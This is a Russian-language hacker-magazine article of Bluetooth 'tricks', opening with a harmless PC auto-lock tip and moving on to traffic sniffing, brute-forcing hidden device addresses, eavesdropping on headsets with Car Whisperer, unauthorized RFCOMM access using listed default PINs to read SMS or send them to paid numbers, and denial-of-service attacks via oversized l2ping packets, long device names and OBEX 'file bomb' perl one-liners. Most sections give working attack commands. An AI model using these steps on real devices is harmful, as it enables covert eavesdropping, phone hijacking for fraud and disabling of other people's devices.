Если ты работаешь в комнате, где вместе с тобой сидит с десяток коллег, тебе наверняка приходилось блокировать компьютер, когда уходишь в другое помещение. А что? Не успеешь отойти, как кто-нибудь уже покопается на твоем харде. Расклад не самый приятный. В общем, лочить компьютер нужно обязательно, вопрос в том – как? Можно использовать стандартные возможности винды и по десять раз на дню вводить длиннющий пароль. Или же делать это красиво с помощью технологии Bluetooth . Все просто, как дважды два. Отходишь от компьютера – и он тут же блокируется. Возвращаешься обратно – и лока как не бывало! Единственное условие: как в компьютере, так и в мобильном телефоне должен быть установлен модуль
Bluetooth , а в системе заинсталена программа LockItNow (ты легко можешь ) . Впрочем, приятелям и коллегам можно рассказывать о телепатических возможностях, а потом продавать секрет за деньги:). Кстати говоря, если под рукой BT-модуля нет, то его можно заменить телефоном, который поддерживает «синий зуб» (подключи по COM-порту).

Трюк 3: Снифаем BT-трафик из эфира

Мастерство начинается с понимания. Не возникало ли у тебя когда-нибудь желания посмотреть внутрь протокола и узнать, как происходит обмен данными через «синий зуб»? Прослушивание трафика Bluetooth может выполняться только «в себя», то есть выполняется перехват исходящего и входящего трафика узла, на котором ты отдал команды. В этом деле немаловажное значение имеет так называемый Host Controller Interface (HCI), который позволяет обращаться к передатчику. HCI-узел обычно подключается к узлу драйвера устройства Bluetooth (входящий поток) и к узлу L2CAP (исходящий поток). Windows платформа по умолчанию такой возможности не предоставляет. Однако сторонними разработчиками были выпущены
специальные драйвера, которые позволяют переводить стандартный донгл в сниффер . Традиционно показательной в этом плане является работа FTS4BT Wireless Bluetooth Protocol Analyzer , стоящего бешеные деньги. Продукт цепляет тем, что поддерживает новый Bluetooth v2.0 + EDR , на базе которого работают современные устройства и, более того, способен на лету декодировать весь трафик из эфира, аккуратно отсортировывая аудио, данные протоколов приложений и многое другое. Понятно, что для снифинга (да и вообще) наиболее актуальны USB-донглы класса 1, радиус действия которых достигает ста метров.

Трюк 4: Работаем с BT-адаптером напрямую

Долгое время Bluetooth стеки для Windows предоставляли настолько скудные возможности , что программисты просто обходили эту платформу стороной. Этим объясняется, что большинство программ для серьезных забав c «синим зубом» разрабатываются под никсовую платформу. Некоторые из хитрых приемов мы разберем именно на это платформе, а именно FreeBSD (напомню, что на диске прошлого номера мы выкладывали свежий 7.0 релиз этой ОС). Сама технология Bluetooth официально стала поддерживаться на ней только с 5-ой ветки на базе подсистемы Netgraph. Радует, что большинство USB-адаптеров совместимы с драйвером ng_ubt (его необходимо завести перед подключением устройства). Попробуем?

1. Подключаем устройство: kldload ng_ubt
2. Копируем сценарий подгрузки стека в удобное место: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
3. Копируем сценарий подгрузки стека в удобное место и запускаем: sh /usr/local/etc/rc.bluetoots start ubt0

Теперь хочу познакомить тебя с утилитой hccontrol. Это одна из основных программ для работы с BT-модулем. Именно она выполняет все операции, связанные с интерфейсом HCI, и имеет следующий синтаксис: hccontrol –n <имя_hci_узла> <команда>. Проверим функциональность нашего устройства, просканиров эфир на наличие устройств:

hccontrol –n ubt0hci Inquiry

Как результат, утилита выведет информацию о найденных устройствах, в том числе их MAC-адреса. Надо заметить, что каждое из устройств Bluetooth, будь то хедсет или обыкновенный телефон, представляет некоторый набор сервисов . Базовый перечень включает в себя: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). Чтобы выяснить, какие сервисы предоставляет то или иное устройство, используется запрос на специальном протоколе SPD (Service Descovery Protocol). Сервер SPD работает непосредственно на машине-хосте и является исключительно информационной составляющей (повлиять на него
невозможно). Определить, какие сервисы предоставляют найденные устройства, можно с помощью соответствующей утилиты:

# spdcontrol -a browse

Трюк 5: Находим скрытые устройства

Итак, эфир мы просканировали и даже выяснили, какие сервисы доступны на активных устройствах. Но вот загвоздка! Некоторые девайсы никак не выдают своего присутствия, поскольку находятся в режиме «Undiscoverable mode» и не отвечают на широковещательные запросы. По настройкам своего телефона ты наверняка знаешь о подобной опции безопасности. Однако обнаружить такие устройства все-таки можно !

Самый известный прием их обнаружения – тупой перебор MAC-адресов, то есть последовательная посылка запросов на разные адреса из определенного диапазона. Для этого нужно использовать очень простую утилиту Redfang , которая перебирает последние шесть байт адреса устройства и таким образом обнаруживает спрятавшиеся устройства.

Другой вариант – это использовать пассивные методики : перевести свое устройство в режим ожидания, при этом назначить сети какое-нибудь привлекательное имя:

hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

В результате отобразятся все входящие соединения, среди которых могут запросто оказаться товарищи со скрытыми идентификаторами.

Трюк 6: Перехватываем из эфира разговоры по гарнитуре

Одна из основных угроз радиотехнологий состоит в том, что данные можно перехватить. Первое, что приходит в голову, касаемо Bluetooth – прослушать разговоры людей, использующих гарнитуру . И зачастую это реально! На хакерском фестивале What the Hack в Нидерландах специалисты из группы Trifinite продемонстрировали, как при помощи ноутбука с Linux, специальной программы и направленной антенны можно подслушать, о чем говорит через Bluetooth-гарнитуру водитель проезжающего автомобиля. Группа разработала программу Car Whisperer («Автомобильный шептун»). Возможности программы относительно невелики: прослушать можно только тех, кто забыл сменить заводские пароли доступа к Bluetooth наподобие
«0000» или «1234». Но таких бедолаг, поверь, очень и очень много! «Шептун» способен вклиниться и успешно пройти «pairing» устройств, получив информацию, передаваемую с каркита или хедсета на мобилку. Хочу обратить внимание: утилита позволяет не только получить информацию, передающуюся между хедсетом и мобилой, но и инжектить туда свою. Мы решили проверить возможности этой программы, скачав Car Whisperer с сайта разработчиков.

hciconfig адаптер class 0x500204
# 0x500204 - это класс «phone»

В противном случае некоторые «умные» девайсы могут заподозрить неладное. Смотрим синтаксис утилиты, который выглядит следующим образом:

./carwhisperer «что внедряем в линию» «что захватываем из линии» «адрес устройства» [канал]

Мы взяли внедряемый файл прямо из папки утилиты, а в качестве выходного указали out.raw:

./carwhisperer 0 message.raw /tmp/out.raw
00:15:0E:91:19:73

На выходе получаем файл out.raw. Прослушать его в чистом виде нельзя: необходимо преобразовать в аудио формат, для чего потребуется дополнительная утилита. Подойдут довольно многие аудио конвертеры, например :

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wav

Кроме прослушивания, можно войти в систему, просмотреть телефонную книгу и воспользоваться другими возможностями «свободных рук» с Bluetooth. Принцип такой: сначала осуществляется поиск активных устройств и проверка на предмет сервиса HS (Head Set). Далее исследуется MAC-адрес устройства и производится попытка подключения с использованием стандартного ключа. Если коннект установлен, то с устройством можно делать все, что угодно (в пределах доступного набора AT-команд).

На практике это выглядит следующим образом. Сначала осуществляется поиск всех активных гарнитур с помощью команды «sdptool search HS», которая выдает примерно такой ответ:

Inquiring ...
Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE...) - pin="5475"
Audi UHV (00:0E:9F...) - pin="1234"
O"Neill (00:80:37...) - pin="8761"
Cellink (00:0A:94...) - pin="1234"
Eazix (00:0C:84...) - pin="1234"

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам . При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Трюк 7: DDoS BT-устройств

Подход традиционен. DDoS реально провести, когда хостовый девайс («master») выполняет работу, во много раз превосходящую клиентскую. Такую ситуацию называют атакой на отказ в обслуживании (Denial Of Service). Она может подвесить телефон или привести к быстрой разрядке батарейки. Провести атаку можно несколькими способами. Начнем со стандартных средств. Самое очевидное – пинговать девайс пакетами большого размера. Сделать это можно, указав утилите l2ping в качестве параметра «-s» флаг:

# l2ping -s 10000 -b "МАС адрес"

Сама программа, как ты уже понял, является родственником ping в bluetooth среде и служит для проверки связи и наличия соединения. Другой способ, принципиально отличающийся от первого, состоит в использовании приема «fuzzing» – своеобразной техники-лотереи, потому как заранее неизвестно, что произойдет. Это новое веяние в выявлении уязвимостей в продуктах без анализа исходных кодов. Полагается техника только на интерактивное общение с объектом на понятном для него языке, но с абсолютно хаотичными аргументами и значениями-переменными. Хакерской задачей будет сделать так, чтобы видимое название телефона состояло из достаточно большого числа элементов. При обнаружении его «master’ом» в 70%
случаев происходит переполнение или отказ в обслуживании:

hciconfig hci0 name `perl -e "print "ash" x 3137"`
# Команда для линукса
hccontrol –n адаптер change_local_name “новое имя”)
# пример для FreeBSD

Многие телефоны по-прежнему не могут переварить файлы-бомбы. Вот простая реализация подобного приема.

1. Сначала готовят «бомбу». Известный пример:
   echo `perl -e ‘print "skvz" x 3137’` > file
2. После чего используют модифицированную утилиту для взаимодействия с OBEX – USSP PUSH (xmailserver.org/ussp-push.html)
   ./obextool push file 00:0A:3A:54:71:95 `perl -e ‘print "skvz" x 3137’` 3